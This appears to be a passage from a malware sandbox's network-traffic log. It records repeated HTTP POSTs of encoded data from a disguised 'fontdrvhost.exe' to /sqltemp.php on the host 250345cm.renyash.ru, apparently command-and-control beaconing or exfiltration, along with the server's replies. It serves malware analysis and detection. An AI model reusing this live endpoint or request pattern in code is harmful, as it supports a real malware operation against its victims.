                                                                                                                                                                                            CF-RAY: 8fb2ff5738e60f5b-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=7719&min_rtt=1498&rtt_var=13005&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=28475&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            141192.168.2.450154104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:46.543155909 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:53:46.904887915 CET1012OUTData Raw: 53 57 5f 56 51 5f 54 55 58 56 52 59 56 5e 59 51 5b 5c 54 50 55 5d 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SW_VQ_TUXVRYV^YQ[\TPU]PTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-39X ?1Y3?E8:#-+*X< 3Y+("1,+V-*&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:53:47.008742094 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:47.287607908 CET802INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:47 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GwH2vD9112QFA%2BYfS8GGTxmsXVTwjJPZ3uWIDOVg0iivDopogejrI7F7FqxWojHXpOScNBXwAQzG9p6HrCFZTMDjqBwlNIyZ%2BqJSVOVWnxEKky0e2UXCKYDchV5oJKuKrii9YarE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff5c7c1443cd-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3807&min_rtt=1748&rtt_var=4774&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=80118&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            142192.168.2.450155104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:47.425374985 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:53:47.786308050 CET1012OUTData Raw: 53 52 5a 54 51 5a 54 54 58 56 52 59 56 5f 59 56 5b 53 54 5c 55 5d 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SRZTQZTTXVRYV_YV[ST\U]PYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.'?7,!%>#;:1V4-+? (><\720(&%??:&Y.,Y-9
                                                                                                                                                                                            Jan 1, 2025 14:53:47.899344921 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:48.067704916 CET808INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:48 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TLK5p4yv5oT%2FPtpvWtIGYlweAoVAoBME2m12DOcUGkQ7hsL3BvaNcDwU%2BbTU92nzWQ4N%2BHox6BB1ZG8XpAhKCCOFxvHOawZ8JfszBL7heEP5NsxC7HKetnWmUswq%2BOohpnn%2BAvV6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff620ab24237-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3985&min_rtt=1812&rtt_var=5027&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=76029&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            143192.168.2.450156104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:48.331922054 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1008
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:53:48.685626984 CET1008OUTData Raw: 53 52 5f 51 54 5d 54 54 58 56 52 59 56 59 59 55 5b 58 54 5f 55 5a 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SR_QT]TTXVRYVYYU[XT_UZPZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-')Y4.$?@/ =()7W*#4((;!B2/T,*&Y.,Y-)
                                                                                                                                                                                            Jan 1, 2025 14:53:48.794903040 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:49.049679995 CET807INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:49 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mTTQfXE58hG8mq1Hd3q8Ae8ANzbLSD90dBAlrX2X4hiZywHG%2BBtJjAY6CvAoPtZbvM1dlyAbA30c7naEYfZGQpXJHjdryMOd1qTAbiL%2BWO0%2BABgSzZVNdh%2BP6Qvh5OO8iS8YjOgE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff67ad788c35-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3286&min_rtt=1937&rtt_var=3424&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1303&delivery_rate=114698&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            144192.168.2.450157104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:49.166752100 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:53:49.511910915 CET1012OUTData Raw: 53 55 5f 51 51 5a 54 56 58 56 52 59 56 5d 59 57 5b 5c 54 5a 55 5b 50 5a 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SU_QQZTVXVRYV]YW[\TZU[PZZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X05[#,1_'>$.:1V!=[<:7T)=<413\<%A1<$.&Y.,Y-1
                                                                                                                                                                                            Jan 1, 2025 14:53:49.610718012 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:49.787396908 CET808INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:49 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AkghSdF7oVYKjO2JU%2BjwPLZDfWY2IHbgh%2B%2BLpZABLPofJWZfcf4j3jGEw%2BbWNvD81CAsY2KvJK7%2FnoCftYOVpOG2V80wVR3jG0JrODoxUl52du102xhqGaSQGTIAyCK1OrOPmCbk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff6cc80e41f2-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4051&min_rtt=1631&rtt_var=5452&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=69540&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            145192.168.2.450158104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:49.920640945 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:50.277642012 CET1012OUTData Raw: 56 52 5f 57 54 5e 51 55 58 56 52 59 56 5f 59 56 5b 53 54 50 55 55 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VR_WT^QUXVRYV_YV[STPUUP\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.X$> =3><,\! >$Z<_;*>74"<+;5C1/7::&Y.,Y-9
                                                                                                                                                                                            Jan 1, 2025 14:53:50.365046978 CET25INHTTP/1.1 100 Continue


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            146192.168.2.450159104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:50.550461054 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1852
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:50.906358957 CET1852OUTData Raw: 53 53 5a 53 51 58 54 51 58 56 52 59 56 5c 59 55 5b 58 54 50 55 5b 50 58 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SSZSQXTQXVRYV\YU[XTPU[PXZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-'=]7?-Y3>?,*7/(9')4\!1(?!%'T.*&Y.,Y-5
                                                                                                                                                                                            Jan 1, 2025 14:53:51.023423910 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:51.277184010 CET951INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:51 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NwYsGBuryt3mmOvS5jRnYjYEZvJ%2FLRimv6eD%2BegnunEfUtd1CS7eraOw5bqQEL9frC1bC3oKroxZZAQ5KNS75C2LEWwdPlc0M3VazWx1HqjWKghWrfCFxWGEoLy3UBQwyW1D1Rrz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff759b547c88-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4326&min_rtt=2006&rtt_var=5392&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2171&delivery_rate=70984&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 39 38 0d 0a 00 1f 26 0f 2a 13 2a 56 26 54 24 11 28 04 27 56 31 3e 2d 00 3f 16 31 01 27 10 28 01 28 3a 30 00 22 05 2e 03 32 06 24 59 21 3d 3b 11 30 34 2b 59 05 1c 20 40 21 2f 06 5b 2a 03 37 5d 25 3c 31 5a 33 07 2b 06 2a 3b 33 0b 34 05 27 13 30 03 24 5c 29 5c 20 54 30 02 0d 5b 39 06 36 0b 30 10 2c 54 00 11 26 1d 25 21 12 59 23 37 3c 1f 20 32 29 13 32 1a 32 1a 26 12 2c 0b 23 17 26 15 27 32 38 06 35 0a 39 00 26 5d 25 10 23 04 34 0d 3d 3e 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 98&**V&T$('V1>-?1'((:0".2$Y!=;04+Y @!/[*7]%<1Z3+*;34'0$\)\ T0[960,T&%!Y#7< 2)22&,#&'2859&]%#4=>%S -H?WS0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            147192.168.2.450160104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:50.706374884 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:51.058682919 CET1012OUTData Raw: 56 57 5f 5d 51 58 54 55 58 56 52 59 56 51 59 50 5b 52 54 50 55 5e 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VW_]QXTUXVRYVQYP[RTPU^P]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.$7>3>;:1 -?*9#V)= 4!#]+;%1/ 9:&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:53:51.146275043 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:51.408626080 CET803INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:51 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uDkaHZmitvTv8mH8OxhxzE4PSEJEjWbEh3k07MjyY9w6tIBsuILE3cFJUkedwqKavpaYHvsOwpTY%2BWjYQIN8rV3frJEylsLMMQH0EabzvfRow1UGQRyo%2FSYI6FM1FhWYgeF1AdtS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff766e927ced-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2422&min_rtt=1890&rtt_var=1774&sent=3&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=237282&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            148192.168.2.450161104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:51.537328959 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:53:51.886874914 CET1012OUTData Raw: 56 53 5f 57 54 50 51 50 58 56 52 59 56 58 59 5f 5b 53 54 5e 55 55 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VS_WTPQPXVRYVXY_[ST^UUP\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.3/]7<9'=$, +)'=.\#",(8)&/+T,*&Y.,Y-%
                                                                                                                                                                                            Jan 1, 2025 14:53:51.983777046 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:52.165478945 CET806INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:52 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t9H5xn1os5k6jxXZli3FXvp%2FbT3u%2BqiBt4f%2BFIVnhT6BqF7gdzXFC7h72FAU4DS3sS0xDsTdU1q6IgM0zOGedzm16JNpWI89qXvqpsQqgtDfocyQ8Zcg1BKxnkU9mG2QroDW%2Boh9"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff7b9ba043c4-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=8283&min_rtt=1714&rtt_var=13781&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=26902&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            149192.168.2.450162104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:52.293652058 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:53:52.636948109 CET1012OUTData Raw: 56 52 5a 53 54 5b 54 57 58 56 52 59 56 58 59 52 5b 5e 54 5c 55 54 50 55 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VRZST[TWXVRYVXYR[^T\UTPUZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-0-#?.3X4/9-T#-(8=>;7<8!$/'U9*&Y.,Y-%
                                                                                                                                                                                            Jan 1, 2025 14:53:52.737909079 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:53.002363920 CET808INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:52 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
